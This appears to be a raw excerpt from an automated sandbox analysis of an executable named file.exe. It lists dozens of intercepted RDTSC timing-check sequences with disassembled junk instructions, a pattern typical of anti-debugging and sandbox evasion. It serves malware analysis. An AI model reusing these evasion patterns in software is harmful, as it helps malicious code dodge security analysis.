Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 783F2C second address: 783F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jnc 00007F9498E4A776h 0x0000000e popad 0x0000000f jmp 00007F9498E4A785h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 783F50 second address: 783F5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007F94990FE566h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78CC29 second address: 78CC33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F9498E4A776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78D95B second address: 78D960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78D960 second address: 78D965 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791CB5 second address: 791CBF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F94990FE566h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791CBF second address: 791CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791CC9 second address: 791CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791CCD second address: 791CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791E26 second address: 791E30 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F94990FE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791F7D second address: 791F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791F81 second address: 791FB1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F94990FE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F94990FE570h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F94990FE574h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791FB1 second address: 791FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7923C7 second address: 7923CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7923CD second address: 7923D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7923D3 second address: 7923D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7923D9 second address: 7923DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79253D second address: 792545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 792545 second address: 79254A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79254A second address: 792552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 792552 second address: 792556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 792996 second address: 79299A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79299A second address: 7929A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 792AE8 second address: 792AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79840A second address: 79840F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79840F second address: 798430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F94990FE56Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F94990FE56Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C391 second address: 79C397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 706B85 second address: 706BA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jnc 00007F94990FE566h 0x0000000f jmp 00007F94990FE56Dh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79BAB5 second address: 79BABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F9498E4A776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79BABF second address: 79BAC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79BAC3 second address: 79BAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9498E4A77Fh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d js 00007F9498E4A79Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79BAE4 second address: 79BAEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F94990FE566h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79BC69 second address: 79BC89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop ebx 0x0000000d jno 00007F9498E4A788h 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 popad 0x00000018 jnp 00007F9498E4A776h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79BDC8 second address: 79BDCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1C4C second address: 7A1C52 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1C52 second address: 7A1C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F94990FE576h 0x0000000d js 00007F94990FE566h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1C76 second address: 7A1C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A04AF second address: 7A04BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F94990FE56Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A04BF second address: 7A04D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F9498E4A776h 0x00000011 jg 00007F9498E4A776h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A04D6 second address: 7A04F3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F94990FE566h 0x00000008 jmp 00007F94990FE56Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A04F3 second address: 7A04F9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A0677 second address: 7A0689 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F94990FE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A0689 second address: 7A068D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A068D second address: 7A0693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A0693 second address: 7A069C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A069C second address: 7A06A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A0AD6 second address: 7A0ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A0ADC second address: 7A0AE2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 750C47 second address: 750C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 750C4C second address: 750C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A0F33 second address: 7A0F4D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F9498E4A780h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A0F4D second address: 7A0F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F94990FE572h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A0F63 second address: 7A0F74 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9498E4A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1921 second address: 7A1927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1927 second address: 7A1935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9498E4A776h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1935 second address: 7A198D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F94990FE566h 0x0000000a pop edi 0x0000000b jmp 00007F94990FE579h 0x00000010 popad 0x00000011 pushad 0x00000012 ja 00007F94990FE568h 0x00000018 push edi 0x00000019 pop edi 0x0000001a jmp 00007F94990FE573h 0x0000001f jmp 00007F94990FE574h 0x00000024 push ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A198D second address: 7A1993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A5A75 second address: 7A5A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A5A79 second address: 7A5A93 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9498E4A781h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A5A93 second address: 7A5A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4E4E second address: 7A4E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4E56 second address: 7A4E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A52AE second address: 7A52C4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9498E4A77Ch 0x00000008 jng 00007F9498E4A776h 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F9498E4A776h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A52C4 second address: 7A52F1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F94990FE56Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F94990FE573h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A52F1 second address: 7A530B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A786h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A530B second address: 7A5311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A5311 second address: 7A5321 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9498E4A77Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC582 second address: 7AC587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC587 second address: 7AC5A2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9498E4A782h 0x00000008 jno 00007F9498E4A776h 0x0000000e jo 00007F9498E4A776h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC727 second address: 7AC72B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ACE38 second address: 7ACE56 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007F9498E4A776h 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 jmp 00007F9498E4A77Ch 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ACE56 second address: 7ACE8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F94990FE578h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F94990FE576h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ACE8A second address: 7ACE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AD15D second address: 7AD165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AD165 second address: 7AD18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9498E4A780h 0x00000009 pop edx 0x0000000a popad 0x0000000b jl 00007F9498E4A793h 0x00000011 jp 00007F9498E4A77Eh 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AD9B2 second address: 7AD9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AD9BC second address: 7AD9DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9498E4A784h 0x00000009 popad 0x0000000a push eax 0x0000000b jnc 00007F9498E4A776h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ADEA0 second address: 7ADEB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F94990FE56Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B2CBC second address: 7B2CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B2CC0 second address: 7B2CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B2CC9 second address: 7B2CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8025 second address: 7B8044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F94990FE566h 0x0000000c jl 00007F94990FE566h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F94990FE56Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8044 second address: 7B8053 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9498E4A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7199 second address: 7B719E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B731A second address: 7B7329 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F9498E4A776h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7329 second address: 7B7332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7332 second address: 7B733C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9498E4A776h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7756 second address: 7B775A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B775A second address: 7B7769 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F9498E4A776h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7A71 second address: 7B7A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7D43 second address: 7B7D61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A782h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7D61 second address: 7B7D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7D65 second address: 7B7D6B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7D6B second address: 7B7D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jng 00007F94990FE566h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BA2AE second address: 7BA2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BFE99 second address: 7BFEC4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F94990FE56Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F94990FE575h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C054D second address: 7C0569 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F9498E4A77Fh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0857 second address: 7C087F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F94990FE578h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e jp 00007F94990FE566h 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C09CE second address: 7C09D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0B2F second address: 7C0B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0B35 second address: 7C0B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9498E4A788h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0B52 second address: 7C0B57 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
